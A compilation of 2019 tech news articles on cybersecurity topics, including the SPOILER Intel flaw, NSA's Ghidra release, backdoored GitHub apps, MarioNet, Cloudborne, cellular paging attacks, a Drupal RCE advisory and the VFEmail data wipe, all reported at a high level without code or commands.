Tech News - Cybersecurity

Intel CPU’s are reportedly vulnerable to a new attack: “SPOILER: Speculative Load Hazards Boost Rowhammer and Cache Attacks". The vulnerability takes advantage of speculative execution in the Intel CPU’s, and was discovered by computer scientists at Worcester Polytechnic Institute in Massachusetts, and the University of Lübeck in Germany. According to the research, the flaw is a “novel microarchitectural leakage which reveals critical information about physical page mappings to user space processes." The flaw can be exploited by malicious JavaScript within a web browser tab, malware running on the system or any illicit logged in users, to steal sensitive information and other data from running applications. The research paper further states that the leakage can be exploited only by a limited set of instructions, and is visible in all Intel generations starting from the 1st generation Intel Core processors, while being independent of the OS. It also works from within virtual machines and sandboxed environments. The flaw is very similar to the Spectre attacks that were revealed in July, last year. The Spoiler attack also takes advantage of speculative execution- like the Spectre attack- and reveals memory layout data, making it easy for other attacks like Rowhammer, cache attacks, and JavaScript-enabled attacks to be executed. "The root cause of the issue is that the memory operations execute speculatively and the processor resolves the dependency when the full physical address bits are available," says Ahmad Moghimi, one of the researchers who contributed to the paper. "Physical address bits are security sensitive information and if they are available to user space, it elevates the user to perform other micro architectural attacks." Intel was informed of the findings in early December, last year. However, they did not immediately respond to the researchers.  An Intel spokesperson has now provided Techradar with the following statement on the Spoiler vulnerability: “Intel received notice of this research, and we expect that software can be protected against such issues by employing side channel safe software development practices. This includes avoiding control flows that are dependent on the data of interest. We likewise expect that DRAM modules mitigated against Rowhammer style attacks remain protected. Protecting our customers and their data continues to be a critical priority for us and we appreciate the efforts of the security community for their ongoing research.” Impact of SPOILER by performing Rowhammer attack in a native user-level environment The research paper defines the Rowhammer attack as : “an attack causing cells of a victim row to leak faster by activating the neighboring rows repeatedly. If the refresh cycle fails to refresh the victim fast enough, that leads to bit flips. Once bit flips are found, they can be exploited by placing any security-critical data structure or code page at that particular location and triggering the bit flip again.” In order to perform a Rowhammer attack, the adversary needs to access DRAM rows that are adjacent to a victim row and ensure that multiple virtual pages co-locate on the same bank. Double-sided Rowhammer attacks cause bit flips faster owing to the extra charge on the nearby cells of the victim row and they further require access to contiguous memory pages. SPOILER can help boosting both single and double-sided Rowhammer attacks by its additional 8-bit physical address information and result in the detection of contiguous memory. The researchers used SPOILER to detect aliased virtual memory addresses where the 20 LSBs of the physical addresses match. These bits were then used by the memory controller for mapping the physical addresses to the DRAM banks. The  majority of the bits are known using SPOILER. Further, “a attacker can directly hammer such aliased addresses to perform a more efficient single-sided Rowhammer attack with a significantly increased probability of hitting the same bank.” The researchers reverse engineered the DRAM mappings for different hardware configurations using the DRAMA tool, and only a few bits of physical address entropy beyond the 20 bits remain unknown. To verify if aliased virtual addresses co-locate on the same bank, they used the row-conflict side channel It is observed that whenever the number of physical address bits used by the memory controller to map data to physical memory is equal to or less than 20,  the researchers always hit the same bank. To summarize their findings, SPOILER drastically improves the efficiency of finding addresses mapping to the same bank without the need of an administrative privilege or a reverse engineering of the memory controller mapping. This approach also works in sandboxed environments such as JavaScript. You can go through the Research paper for more insights on the SPOILER flaw. Linux 4.20 kernel slower than its previous stable releases, Spectre flaw to be blamed, according to Phoronix Intel releases patches to add Linux Kernel support for upcoming dedicated GPU releases Researchers prove that Intel SGX and TSX can hide malware from antivirus software

The National Security Agency released the Ghidra toolkit, today at the RSA security conference in San Francisco. Ghidra is a free, software reverse engineering (SRE) framework developed by NSA's Research Directorate for NSA's cybersecurity mission. Ghidra helps in analyzing malicious code and malware like viruses and can also provide cybersecurity professionals with a better understanding of potential vulnerabilities in their networks and systems. “The NSA's general plan was to release Ghidra so security researchers can get used to working with it before applying for positions at the NSA or other government intelligence agencies with which the NSA has previously shared Ghidra in private”, ZDNet reports. Ghidra’s anticipated release broke out at the start of 2019 following which users have been looking forward to this release. This is because Ghidra is a free alternative to IDA Pro, a similar reverse engineering tool which can only be available under an expensive commercial license, priced in the range of thousands of US dollars per year. NSA cybersecurity advisor, Rob Joyce said that Ghidra is capable of analyzing binaries written for a wide variety of architectures, and can be easily extended with more if ever needed. https://twitter.com/RGB_Lights/status/1103019876203978752 Key features of Ghidra Ghidra includes a suite of software analysis tools for analyzing compiled code on a variety of platforms including Windows, Mac OS, and Linux It includes capabilities such as disassembly, assembly, decompilation, graphing and scripting, and hundreds of other features Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. With Ghidra users may develop their own Ghidra plug-in components and/or scripts using the exposed API To know more about the Ghidra cybersecurity tool, visit its documentation on GitHub repo or its official website. Security experts, Wolf Halton and Bo Weaver, discuss pentesting and cybersecurity [Interview] Hackers are our society’s immune system – Keren Elazari on the future of Cybersecurity 5 lessons public wi-fi can teach us about cybersecurity

Security researcher expose malicious GitHub repositories that host more than 300 backdoored apps An unnamed security researcher at dfir.it recently revealed certain GitHub accounts that host more than “300 backdoored Windows, Mac, and Linux applications and software libraries”. The researcher in his blog titled, “The Supreme Backdoor Factory” explained how he stumbled upon this malicious code and various other codes within the GitHub repo. The investigation started when the researcher first spotted a malicious version of the JXplorer LDAP browser. The researcher in his blog post states, “I did not expect an installer for a quite popular LDAP browser to create a scheduled task in order to download and execute PowerShell code from a subdomain hosted by free dynamic DNS provider.” According to ZDNet, “All the GitHub accounts that were hosting these files --backdoored versions of legitimate apps-- have now been taken down.” The malicious files included codes which could allow boot persistence on infected systems and further download other malicious code. The researcher has also mentioned that the malicious apps downloaded a Java-based malware named Supreme NYC Blaze Bot (supremebot.exe). “According to researchers, this appeared to be a "sneaker bot," a piece of malware that would add infected systems to a botnet that would later participate in online auctions for limited edition sneakers”, ZDNet reports. The researcher revealed that some of the malicious entries were made via an account with the name of Andrew Dunkins that included a set of nine repositories, each hosting Linux cross-compilation tools. Each repository was watched or starred by several already known suspicious accounts. The report mentions that accounts that did not host backdoored apps were used to ‘star’ or ‘watch’ the malicious repositories and help boost their popularity in GitHub's search results. To know about these backdoored apps in detail, read the complete report, ‘The Supreme Backdoor Factory’ Brave Privacy Browser has a ‘backdoor’ to remotely inject headers in HTTP requests: HackerNews Undetected Linux Backdoor ‘SpeakUp’ infects Linux, MacOS with cryptominers Cisco and Huawei Routers hacked via backdoor attacks and botnets  

Microsoft posted an update regarding the new features in Microsoft Office 365, a web-based subscription comprising premium productivity apps as part of Microsoft's Office product line, last week. “We released several new capabilities to help you stay ahead of threats, create a more productive workplace, and keep you in the flow of work”, states the Microsoft team. What’s new in Microsoft 365? Microsoft Threat Experts Microsoft has come out with a new feature called Microsoft threat experts to boost the capabilities of the security teams. Microsoft Threat experts is a ‘threat-hunting service’ that helps you track down and prioritize threats using Windows Defender Advanced Threat Protection (ATP). Microsoft threat experts service connects you with the world-class experts using the new ‘Ask a threat expert’ button, who in turn helps you work through the tough investigation challenges. Priority notifications and integration of electronic health records You can now make use of Priority notifications in Microsoft Teams to enable clinicians to focus on urgent messages to manage patient care and empower your healthcare organization. There’s also an added ability to integrate FHIR-enabled electronic health records (EHR) data within Teams. This will enable the clinicians to securely access patient records, chat with other team members, and start a video meeting. Desktop App Assure and Microsoft FastTrack Microsoft has come out with a new service called Desktop App Assure, as a part of Microsoft FastTrack that offers app compatibility services for Windows 10 and Office 365 ProPlus. FastTrack now also provides guidance on configuring Exchange Online Protection, Office 365 Advanced Threat Protection, Office 365 Message Encryption, and Data Loss Prevention policies. Security Notifications via Microsoft Authenticator You can now receive security alerts for important events on your personal Microsoft account through the Microsoft Authenticator app. Once you receive the push notification, you can quickly view your account activity and take necessary actions to protect your account. You can also add two-step verification to your account using Microsoft Authenticator for added security. New Office app for Windows 10 Users with work, school, or personal Microsoft Account can use the new Office app for Windows 10 to access the available apps, relevant files, and documents. Organizations can also integrate third-party apps, and enable users to search for documents and people across the organization. The new Office app requires a current version of Windows 10. Add data to Excel using a photo You can use the Excel app to click a picture of a printed data table on your Android device and convert the picture into a fully editable table in Excel. Using this new image recognition functionality cuts down on the need to manually enter hardcopy data. This feature has started to roll out for the Excel Android app and will support iOS soon. New file-attached tasks in Microsoft To-Do Users can now quickly attach files and photos to help make tasks more actionable. Microsoft team says that this was a highly requested feature and has been made available on all platforms and syncs across all your devices. For more information, check out the official Microsoft blog. Microsoft Office 365 now available on the Mac App Store Microsoft announces Internet Explorer 10 will reach end-of-life by January 2020 Microsoft joins the OpenChain Project to help define standards for open source software compliance

A Security researcher from Google’s Project Zero team recently revealed a high severity flaw in the macOS kernel that allows a copy-on-write (COW) behavior, a resource-management technique, also referred to as shadowing. The researcher informed Apple about the flaw back in November 2018, but the company is yet to fix it even after exceeding the 90-day deadline. This is the reason why the bug is now being made public with a "high severity" label. According to a post on Monorail, the issue tracking tool is for chromium-related projects, “The copy-on-write behavior works not only with anonymous memory but also with file mappings. This means that, after the destination process has started reading from the transferred memory area, memory pressure can cause the pages holding the transferred memory to be evicted from the page cache. Later, when the evicted pages are needed again, they can be reloaded from the backing filesystem.” “This means that if an attacker can mutate an on-disk file without informing the virtual management subsystem, this is a security bug. MacOS permits normal users to mount filesystem images. When a mounted filesystem image is mutated directly (e.g. by calling pwrite() on the filesystem image), this information is not propagated into the mounted filesystem”, the post further reads. According to a Google project member, “We've been in contact with Apple regarding this issue, and at this point no fix is available. Apple is intending to resolve this issue in a future release, and we're working together to assess the options for a patch. We'll update this issue tracker entry once we have more details.” A user commented on HackerNews, “Given the requirements that a secondary process should even be able to modify a file that is already open, I guess the expected behavior is that the 1st process's version should remain cached in memory while allowing the on-disk (CoW) version to be updated? While also informing the 1st process of the update and allowing the 1st process to reload/reopen the file if it chooses to do so. If this is the intended/expected behavior, then it follows that pwrite() and other syscalls should inform the kernel and cause prevent the origional cache from being flushed.” To know more about this news, head over to the bug issue post. Drupal releases security advisory for ‘serious’ Remote Code Execution vulnerability Google’s home security system, Nest Secure’s had a hidden microphone; Google says it was an “error” Firedome’s ‘Endpoint Protection’ solution for improved IoT security

Coinhive, an in-browser Monero cryptocurrency miner, announced that it would be shutting down all its operations next week on March 8, 2019. Users will be given time until April 30th for withdrawing any remaining Monero from their accounts. Launched in 2017, Coinhive service provided ways to mine cryptocurrency in the background of a website, turning visitors’ processing power directly into cash. The company in their blog post mentioned reasons for the service closure including the fall in the value of Monero over the past year. Coinhive said, "The drop in hash rate (over 50%) after the last Monero hard fork hit us hard. So did the 'crash' of the cryptocurrency market with the value of XMR depreciating over 85% within a year. The company further mentions, “This and the announced hard fork and algorithm update of the Monero network on March 9 has led us to the conclusion that we need to discontinue Coinhive." Security researcher Troy Mursch said, “Coinhive had a market share of 62 percent in August 2018.” According to an academic paper, the company was making in an estimated $250,000 per month up until last summer, the ZDNet reports. https://twitter.com/bad_packets/status/1030201187381927936 Jérôme Segura, malware researcher at Malwarebytes told ZDNet “While 'cryptojacking' or 'drive-by mining' dominated the threat landscape in late 2017 and early 2018, it took a backseat for the rest of the year, with the notable exception of some campaigns powered by a large number of compromised IoT devices (i.e. MikroTik exploits).” “Some sites were upfront with visitors about their use of the software, most notably the news website Salon and UNICEF, but countless others either didn’t disclose the fact they were using it or saw the Javascript code added without their knowledge as part of a “cryptojacking” malware attack. Eventually, ad-blockers and anti-virus software learned to identify and block such code, so that users could avoid having their CPUs used and their batteries drained by the software”, The Verge reports. To know more about the Coinhive closure in detail, head over to Coinhive’s official blog post. Hackers are our society’s immune system – Keren Elazari on the future of Cybersecurity Winbox vulnerability in MicroTik routers forwarding traffic to attackers, say researchers at NetLabs 360 Cryptojacking is a growing cybersecurity threat, report warns

If you think closing down a website, closes down the possibility of the device being tracked, then you are wrong! Some Greek researchers have revealed a new browser-based attack named MarioNet, using which attackers can run malicious code inside users' browsers even after users have closed the webpage or even navigated away from the web page on which they got infected. The researchers in the paper titled, “Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation” have also explained different anti-malware browser extensions and anti-mining countermeasures, and also puts forward several mitigations that browser makers could take. The MarioNet attack was presented on February 25 at the NDSS 2019 conference in San Diego, USA. MarioNet allows hackers to assemble giant botnets from users’ browsers. The researchers state that these bots can be used for in-browser crypto-mining (crypto jacking), DDoS attacks, malicious files hosting/sharing, distributed password cracking, creating proxy networks, advertising click-fraud, and traffic stats boosting. Even after a user exits a browser or web page, MarioNet can easily survive. This is because modern web browsers support a new API called Service Workers. “This mechanism allows a website to isolate operations that rendering a page's user interface from operations that handle intense computational tasks so that the web page UI doesn't freeze when processing large quantities of data”, the ZDNet reports. In their research paper, they explain technical details of how service workers are an update to an older API called Web Workers. They say, unlike web workers, a service worker, once registered and activated, can live and run in the page's background, without requiring the user to continue browsing through the site that loaded the service worker. The attack routine consists of registering a service worker when the user lands on an attacker-controlled website and then abusing the Service Worker SyncManager interface to keep the service worker alive after the user navigates away. The attack doesn't require any type of user interaction as browsers don't alert users or ask for permission before registering a service worker. Everything happens under the browser's hood as the user waits for the website to load. MarioNet allows attackers to place malicious code on high-traffic websites for a short period of time. This allows the attackers to gain a huge user base, remove the malicious code, but continue to control the infected browsers from another central server. The attack can also persist across browser reboots by abusing the Web Push API. This requires the attacker from getting user permission from the infected hosts to access this API. The researchers also highlighted the fact that as Service Workers have been introduced a few years back, the MarioNet attack also works in almost all desktop and mobile browsers. Places, where a MarioNet attack won't work, are IE (desktop), Opera Mini (mobile), and Blackberry (mobile). To know more about MarioNet attack in detail, read the complete research paper. New research from Eclypsium discloses a vulnerability in Bare Metal Cloud Servers that allows attackers to steal data Security researchers discloses vulnerabilities in TLS libraries and the downgrade Attack on TLS 1.3 Remote Code Execution Flaw in APT Linux Package Manager allows man-in-the-middle attack

Security researchers at Eclypsium, a hardware security startup, published a paper yesterday, examining the vulnerabilities in Bare Metal Cloud Servers (BMCs) that allow attackers to exploit and steal data. “We found weaknesses in methods for updating server BMC firmware that would allow an attacker to install malicious BMC firmware..these vulnerabilities can allow an attacker to not only do damage but also add other malicious implants that can persist and steal data”, states the researchers. BMC is a highly privileged component and part of the Intelligent Platform Management Interface (IPMI). It can monitor the state of a computer and allow an operating system reinstall from a remote management console through an independent connection. This means that there’s no need to physically attach a monitor, keyboard, and installation media to the server in BMCs. Now, although Bare-metal cloud offerings come with considerable benefits, they also pose new risks and challenges to security. For instance, in the majority of the cloud services, once a customer uses a bare-metal server, the hardware can be reclaimed by the service provider which is then repurposed for another customer. Similarly, for a bare-metal cloud service offering, the underlying hardware can be easily passed through different owners, providing direct access to control that hardware. This access gives rise to attackers controlling the hardware, who can spend a nominal sum of money for access to a server, and implant malicious firmware at the UEFI, BMC, and within drives or network adapters. This hardware can then get released by the attacker to the service provider, who could further pass it on for use to another customer. Eclypsium researchers have used IBM SoftLayer tecIhnology, as a case study to test the attack scenario on. However, researchers mention that the attack is not limited to any one service provider.IBM acquired SoftLayer Technologies, a managed hosting, and cloud computing provider in 2013 and is now known as IBM Cloud. The vulnerability found has been named as Cloudborne. Researchers chose SoftLayer as the testing environment due to its simplified logistics and access to hardware. However, SoftLayer was using a super vulnerable Supermicro server hardware. It took about 45 minutes for the Eclypsium team to provision the server. Once the instance was provisioned, they found out that it had the latest BMC firmware available. An additional IPMI user was created and given the administrative access to the BMC channels. This system was then finally released to IBM, which kicked off the reclamation process. Researchers noticed that the additional IPMI user was removed during the reclamation process but BMC firmware comprising the flipped bit was still present, meaning that servers’ BMC firmware was not re-flashed during the server reclamation process. “The combination of using vulnerable hardware and not re-flashing the firmware makes it possible to implant malicious code into the server’s BMC firmware and inflict damage or steal data from IBM clients that use that server in the future”, states the researchers. Other than that, BMC logs were also retained during provisioning, giving the new customer insights into the actions of the previous device owner. Also, the BMC root password was the same across provisioning, allowing the attacker to easily have control over the machine in the future. “While these issues have heightened importance for bare-metal services, they also apply to all services hosted in public and private clouds..to secure their applications, organizations must be able to manage these issues—or run the risk of endangering their most critical assets”, mentions Eclypsium researchers. For more information, check out the official Eclypsium paper. Security researchers discloses vulnerabilities in TLS libraries and the downgrade Attack on TLS 1.3 Drupal releases security advisory for ‘serious’ Remote Code Execution vulnerability A WordPress plugin vulnerability is leaking Twitter account information of users making them vulnerable to compromise

A few researchers from Purdue University and The University of Iowa have recently found three new security flaws in 4G and 5G protocols that can easily allow intruders to intercept calls and also track user’s device location. The research paper titled, ‘Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information’ mentions the design weaknesses of the 4G/5G cellular paging protocol, which can be misused by attackers to identify victim’s presence in a particular cell area just from the victim’s soft-identity (e.g., phone number, Twitter handle) with a novel attack called ToRPEDO (TRacking via Paging mEssage DistributiOn) attack. This attack also highlights two other attacks, namely, the PIERCER and the IMSI-Cracking attack which can be carried out via the ToRPEDO attack. The researchers in the paper state, “All of our attacks have been validated in a realistic setting for 4G using cheap software-defined radio and open-source protocol stack.” According to TechCrunch, “Hussain, along with Ninghui Li and Elisa Bertino at Purdue University, and Mitziu Echeverria and Omar Chowdhury at the University of Iowa are set to reveal their findings at the Network and Distributed System Security Symposium in San Diego on Tuesday.” The three security flaws in the 4G/5G cellular paging protocols The ToRPEDO attack The researchers have presented a ToRPEDO attack that exploits a 4G/5G paging protocol weakness. This enables the attacker to verify the victim’s presence in a particular cellular area and in the process identifies the victim’s paging occasion, if the attacker already knows the phone number. ToRPEDO can enable an adversary to verify a victim’s coarse-grained location information, inject fabricated paging messages, and mount denial-of-service attacks. PIERCER attack This attack exploits a 4G paging deployment vulnerability that allows an attacker to determine a victim’s international mobile subscriber identity (IMSI) on the 4G network. IMSI-Cracking attack In this attack, the victim’s IMSI details are leaked for both 4G and 5G. The researchers, in the paper, have demonstrated how by using the ToRPEDO attack as a sub-step, attackers can retrieve a victim device’s persistent identity (i.e., IMSI) with a brute-force IMSI-Cracking attack. One of the co-authors, Syed Rafiul Hussain, told TechCrunch, “Any person with a little knowledge of cellular paging protocols can carry out this attack.” “According to Hussain, all four major U.S. operators — AT&T, Verizon (which owns TechCrunch), Sprint and T-Mobile — are affected by Torpedo, and the attacks can be carried out with radio equipment costing as little as $200”, the TechCrunch reports. Hussain said the flaws were reported to the GSMA,  an industry body that represents mobile operators. GSMA recognized the flaws, but a spokesperson was unable to provide comment when reached. It isn’t known when the flaws will be fixed. One of the users wrote on HackerNews, “Most people consider the fact that your handset will readily talk to any base station that's on the air to be a feature. Try to imagine how things would work if you had to authenticate and authorize every station on the network. It's true that anyone who gets on the air and speaks the air protocol can screw with your phone. Those people are also violating multiple laws and regulations in the course of doing so.” To know more about these flaws in detail, head over to the complete research paper. Read Next Security researchers discloses vulnerabilities in TLS libraries and the downgrade Attack on TLS 1.3 Remote Code Execution Flaw in APT Linux Package Manager allows man-in-the-middle attack Internet Outage or Internet Manipulation? New America lists government interference, DDoS attacks as top reasons for Internet Outages across the world

Last week, the Internet Corporation for Assigned Names and Numbers (ICANN) decided to call for the full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. ICANN took this decision because of the increasing reports of malicious activity targeting the DNS infrastructure. According to ICANN, there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure. The DNS that converts numerical internet addresses to domain names, has been the victim of various attacks by the use of different methodologies. https://twitter.com/ICANN/status/1099070857119391745?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet Last month security company FireEye revealed that hackers associated with Iran were hijacking DNS records, by rerouting users from a legitimate web address to a malicious server in order to steal passwords. This “DNSpionage” campaign, was targeting governments in the United Arab Emirates and Lebanon. The Homeland Security’s Cybersecurity Infrastructure Security Agency had warned that U.S. agencies were also under attack. In its first emergency order amid a government shutdown, the agency ordered federal agencies to take action against DNS tampering. David Conrad, ICANN’s chief technology officer told the AFP news agency that the hackers are “going after the Internet infrastructure itself.” ICANN is urging domain owners for deploying DNSSEC, which is a more secure version of DNS and is difficult to manipulate. DNSSEC cryptographically signs data which makes it more difficult to be spoofed. Some of the attacks target the DNS where the addresses of intended servers are changed with addresses of machines controlled by the attackers. This type of attack that targets the DNS only works when DNSSEC is not in use. ICANN also reaffirms its commitment towards engaging in collaborative efforts for ensuring the security, stability, and resiliency of the internet’s global identifier systems. This month, ICANN offered a checklist of recommended security precautions for members of the domain name industry, registries, registrars, resellers, and related others, to proactively take steps to protect their systems. ICANN aims to assure that internet users reach their desired online destination by preventing “man in the middle” attacks where a user is unknowingly re-directed to a potentially malicious site. Few users have previously been a victim of DNS hijacking and think that this move won’t help them out. One user commented on HackerNews, “This is nonsense, and possibly crossing the border from ignorant nonsense to malicious nonsense.” Another user said, “There is in fact very little evidence that we "need" the authentication provided by DNSSEC.” Few others think that this might work as a good solution. A comment reads, “DNSSEC is quite famously a solution in search of a problem.” To know more about this news, check out ICANN’s official post. Internet governance project (IGP) survey on IPV6 adoption, initial reports Root Zone KSK (Key Sign Key) Rollover to resolve DNS queries was successfully completed RedHat shares what to expect from next week’s first-ever DNSSEC root key rollover

Last week, Swiss Post’s recently launched online voting system’s source code was leaked. The experts who examined the code reported that the system is poorly designed and makes it difficult to audit the code for security and configure it to operate securely. Swiss Post, Switzerland's national postal service also launched a fully verifiable system and a bug bounty program to test the system’s resilience to attacks this month. According to Motherboard report, “critics are already expressing concern about the system’s design and about the transparency around the public test.” Nathalie Dérobert, a spokeswoman for Swiss Post, said the public intrusion test is not meant to be an audit of the code “or to prove the security of the Swiss Post online voting system.” Instead, it’s meant to help inform the developers about improvements they need to make. In an email, Dérobert wrote, “Security is a process and even if the source code passed numerous previous security audits, we expected criticism and even outright negative comments. After all, that is the whole point of publishing the source code: we want a frank response and an honest discussion about the merits and shortcomings of our work… [W]e are determined to take up the negative comments, discuss them with our developing partner Scytl and to get in touch with the people where we see a benefit.” As for the public test of the new online system, more than 2,000 people have registered. The test will take place from February 25 to March 24. As per the rules, the bug bounty program will pay 20,000 Swiss francs to anyone who can manipulate votes in the mock election or 30,000 to 50,000 francs if they manage to manipulate votes without being detected. The Swiss Post is making the source code for the software available to participants. However, the code wasn’t supposed to be open to just anyone to examine. Swiss Post responded to the publication of the code, saying the source code was not leaked as it was already available to anyone who wanted to see it—as long as they registered with Swiss Post. Swiss Post also wrote that there is no NDA or confidentiality agreement around publishing information about the source code or citing parts of the code, but the statement did not say anything about the Scytl technical documents themselves and the architecture and protocol information that is contained in them. Cryptography experts, after examining the allegedly leaked code said: “the system is a poorly constructed and convoluted maze that makes it difficult to follow what’s going on and effectively evaluate whether the cryptography and other security measures deployed in the system are done properly.” Sarah Jamie Lewis, a former security engineer for Amazon and a former computer scientist for England’s GCHQ intelligence agency, said, “Most of the system is split across hundreds of different files, each configured at various levels. I’m used to dealing with Java code that runs across different packages and different teams, and this code somewhat defeats even my understanding.” Lewis said that the system uses cryptographic solutions that are fairly new to the field and that have to be implemented in very specific ways to make the system auditable, but the design the programmers chose thwarts this. “Someone could wire the thing in the wrong place and suddenly the system is compromised. And when you’re talking about code that is supposed to be protecting a national election, that is not a statement someone should be able to make”, Lewis added. The voting system was developed by Swiss Post and the Barcelona-based company Scytl, which was formed by a group of academics who spun it off of their research work at the Universidad Autónoma de Barcelona (Autonomous University of Barcelona) in 2001. “Local cantons, or states, in Switzerland are the ones who administer elections and would be responsible for the configuration. Scytl claims the system uses end-to-end encryption that only the Swiss Electoral Board would be able to decrypt. But there are reasons to be concerned about such claims”, Motherboard reports. Matthew Green, a noted cryptographer teaching cryptography at Johns Hopkins University, said that the system is highly complex and “at this point, I think the only appropriate way to evaluate it is through a professional evaluation by someone trained in this sort of advanced cryptography. And even then I’d be concerned, given the stakes.” To know more about this news, head over to Motherboard’s complete coverage. Drupal releases security advisory for ‘serious’ Remote Code Execution Vulnerability Google’s home security system, Nest Secure’s had a hidden microphone; Google says it was an “error” Firedome’s ‘Endpoint Protection’ solution for improved IoT security

Drupal released a security advisory for a highly critical remote execution (CVE-2019-6340) in its software. Samuel Mortenson, a member of the Drupal Security Team reports that an arbitrary PHP code execution is possible due to a lack of data sanitization in certain field types linked to non-form sources.  Drupal issued the warning a day before Wednesday’s patch release. According to Drupal's blog, a particular site will be affected either if the site has the Drupal 8 core RESTful Web Services (rest) module enabled, allowing PATCH or POST requests, or if the site has another web services module enabled, for instance, JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. To address this vulnerability, Drupal has released security updates for contributed modules for Drupal 7 and Drupal 8. Drupal has also released Drupal 8.6.10 and Drupal 8.5.11 without any core update for Drupal 7. The team has also advised users to install any available security updates for contributed projects after updating Drupal core. Besides this, the blog also states that to immediately mitigate the vulnerability, users can disable all web services modules, or configure their web server(s) to not allow PUT/PATCH/POST requests to web services resources. According to ZDNET, Drupal is the third most popular CMS for website publishing and accounts for about three percent of the world's billion-plus websites. Hackers could use this vulnerability to potentially hijack a Drupal site and take control of a web server and all the websites supported by it. To know more about this announcement visit Drupal’s blog. Drupal 9 will be released in 2020, shares Dries Buytaert, Drupal’s founder Google’s home security system, Nest Secure’s had a hidden microphone; Google says it was an “error” Security researchers discloses vulnerabilities in TLS libraries and the downgrade Attack on TLS 1.3  

On Monday, 11th February, Wisconsin-based email provider, VFEmail, was attacked by an intruder who trashed all of the company’s primary and backup data in the United States. Initial signs of this attack were noticed on Monday, February 11, when users started shooting tweets on the company’s Twitter account stating that they were no longer receiving messages. According to Krebs on Security, “VFEmail tweeted that it had caught a hacker in the act of formatting one of the company’s mail servers in the Netherlands.” Another tweet followed this stating, “nl101 is up, but no incoming email. I fear all US-based data may be lost.” Following this, VFEmail’s founder, Rick Romero, tweeted yesterday, “Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.” https://twitter.com/Havokmon/status/1095297448082317312 Another tweet on the VFEMail account said that the attacker formatted all disks on every server. VFEmail has lost every VM and all files hosted on the available servers. “NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.” https://twitter.com/VFEmail/status/1095038701665746945 Romero has posted certain updates on the company’s website, one of which includes, “We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv@94.155.49.9”. He also wrote, “ At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK. If you reconnect your client to your new mailbox, all your local mail will be lost.” John Senchak, a longtime VFEmail user from Florida, told Krebs on Security, that the attack completely deleted his entire inbox at the company--some 60,000 emails sent and received over more than a decade were lost. He also said, “It looked like the IP was a Bulgarian hosting company. So I’m assuming it was just a virtual machine they were using to launch the attack from. There definitely was something that somebody didn’t want found. Or, I really pissed someone off. That’s always possible.” The company has assured the users that they are working to recover the data as soon as possible. To know more about this news and stay updated, read VFEMail’s complete Twitter thread. Security researchers discloses vulnerabilities in TLS libraries and the downgrade attack on TLS 1.3 Remote Code Execution Flaw in APT Linux Package Manager allows man-in-the-middle attack Apple’s CEO, Tim Cook calls for new federal privacy law while attacking the ‘shadow economy’ in an interview with TIME

Last week, a Huawei engineer reported a vulnerability present in the early Linux 2.6 kernels through version 4.20.11. The Kernel Address Sanitizer (KASAN) that detects dynamic memory errors within the Linux kernel code was used to uncover the use-after-free vulnerability which was present since early Linux versions. The use-after-free issue was found in the networking subsystem's sockfs code and could lead to arbitrary code execution as a result. KASAN (along with the other sanitizers) have already proven quite valuable in spotting various coding mistakes hopefully before they are exploited in the real-world. The Kernel Address Sanitizer picked up another feather in its hat with being responsible for the CVE-2019-8912 discovery. The CVSS v3.0 Severity and Metrics gave this vulnerability a 9.8 CRITICAL score. A fix for this vulnerability is already released and will come to all Linux distributions in a couple of days, and will probably be backported to any supported Linux kernel versions. According to a user on Hacker News, “there may not actually be a proof-of-concept exploit yet, beyond a reproducer causing a KASAN splat. When people request a CVE for a use-after-free bug they usually just assume that code execution may be possible.” To know more about this vulnerability, visit the NVD website. Intel releases patches to add Linux Kernel support for upcoming dedicated GPU releases Undetected Linux Backdoor ‘SpeakUp’ infects Linux, MacOS with crypto miners OpenWrt 18.06.2 released with major bug fixes, updated Linux kernel and more!

Earlier this month, Google upgraded its home security and alarm system, Nest Secure to work with its Google Assistant. This meant that Nest Secure customers would be able to perform tasks like asking Google about the weather. The device came with a microphone for this purpose, without it being mentioned on the device’s published specifications. On Tuesday, a Google spokesperson got in touch with Business Insider and told them that the miss was an “error” on their part. “The on-device microphone was never intended to be a secret and should have been listed in the tech specs. Further, the Nest team added that the microphone has “never been on” and is activated only when users specifically enable the option. As an explanation as to why the microphone was installed in the devices, the team said that it was in order to support future features “such as the ability to detect broken glass.” Before sending over an official statement to Business Insider, the Nest team replied to a similar concern from a user on Twitter, in early February. https://twitter.com/treaseye/status/1092507172255289344 Scott Galloway, professor of marketing at the New York University Stern School of Business, has expressed strong sentiments regarding this news on Twitter https://twitter.com/profgalloway/status/1098228685155508224 Users have even accused Google of “pretending the mistake happened” and slammed Google over such an error. https://twitter.com/tshisler/status/1098231070275686400 https://twitter.com/JoshConstine/status/1098086028353720320   Apart from Google, there have also been multiple cases in the past of Amazon Alexa and Google home listening to people’s conversations, thus invading privacy. Earlier this year, a family in Portland, discovered that its Alexa-powered Echo device had recorded their private conversation and sent it to a random person in their contacts list. Google’s so-called “error” can lead to a drop in the number of customers buying its home security system as well as a drop in the trust users place  in Google’s products. It is high time Google starts thinking along the line of security standards and integrity maintained in its products. Amazon’s Ring gave access to its employees to watch live footage of the customers, The Intercept reports Email and names of Amazon customers exposed due to ‘technical error’; number of affected users unknown Google Home and Amazon Alexa can no longer invade your privacy; thanks to Project Alias!